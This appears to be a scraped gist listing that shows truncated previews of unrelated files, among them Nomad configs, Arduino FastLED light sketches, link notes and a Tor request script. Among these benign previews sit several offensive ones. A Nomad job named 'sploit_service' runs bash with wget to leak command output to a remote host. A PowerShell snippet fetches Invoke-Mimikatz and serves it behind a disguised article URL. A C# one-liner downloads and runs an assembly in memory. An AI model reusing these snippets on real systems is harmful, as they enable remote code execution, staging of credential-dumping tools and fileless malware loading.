This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
job "sploit_service" { | |
datacenters = ["dc1"] | |
group "sploit" { | |
task "shello" { | |
driver = "raw_exec" | |
config { | |
command = "/bin/bash" | |
args = ["-c", "wget http://10.0.0.8:8000/?foo=`which nc`"] | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Increase log verbosity | |
log_level = "DEBUG" | |
# Setup data dir | |
data_dir = "/tmp/client2" | |
# Give the agent a unique name. Defaults to hostname | |
name = "client2" | |
# Enable the client |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Increase log verbosity | |
log_level = "DEBUG" | |
# Setup data dir | |
data_dir = "/tmp/client1" | |
# Give the agent a unique name. Defaults to hostname | |
name = "client1" | |
# Enable the client |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Increase log verbosity | |
log_level = "DEBUG" | |
# Setup data dir | |
data_dir = "/tmp/server1" | |
# Enable the server | |
server { | |
enabled = true |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "FastLED.h" | |
#define NUM_LEDS 100 | |
#define COLOR_ORDER RGB | |
CRGB leds[NUM_LEDS]; | |
//I have a few additional integers in here from different tests. | |
int y = 1; | |
int z = 0; | |
int w = 5; | |
int i = 20; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://www.doityourselfchristmas.com/wiki/index.php?title=Pixel_Wiring_Colors#WS2811 | |
#best arduino code for making the WriteWord magic happen | |
https://www.woodlandmanufacturing.com/articles/news/how-to-make-a-stranger-things-alphabet-sign-with-lights-code/ | |
https://github.com/djhazee/strangerlights/blob/master/strangerlights.py | |
https://imgur.com/gallery/RCJyA | |
https://www.instructables.com/id/Arduino-Based-Stranger-Things-Lights/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import torrequest | |
import stem.connection | |
from stem.connection import connect | |
from torrequest import TorRequest | |
# Choose a proxy port, a control port, and a password. | |
# Defaults are 9050, 9051, and None respectively. | |
# If there is already a Tor process listening the specified |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "FastLED.h" | |
#define NUM_LEDS 50 | |
CRGB leds[NUM_LEDS]; | |
static byte initialHue = 0; | |
byte changeInHue = 255 / NUM_LEDS; | |
void setup() { FastLED.addLeds<WS2811, 6>(leds, NUM_LEDS); } | |
void loop() { | |
//leds[0] = CRGB::Green; FastLED.show(); delay(300); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8080/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
$Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |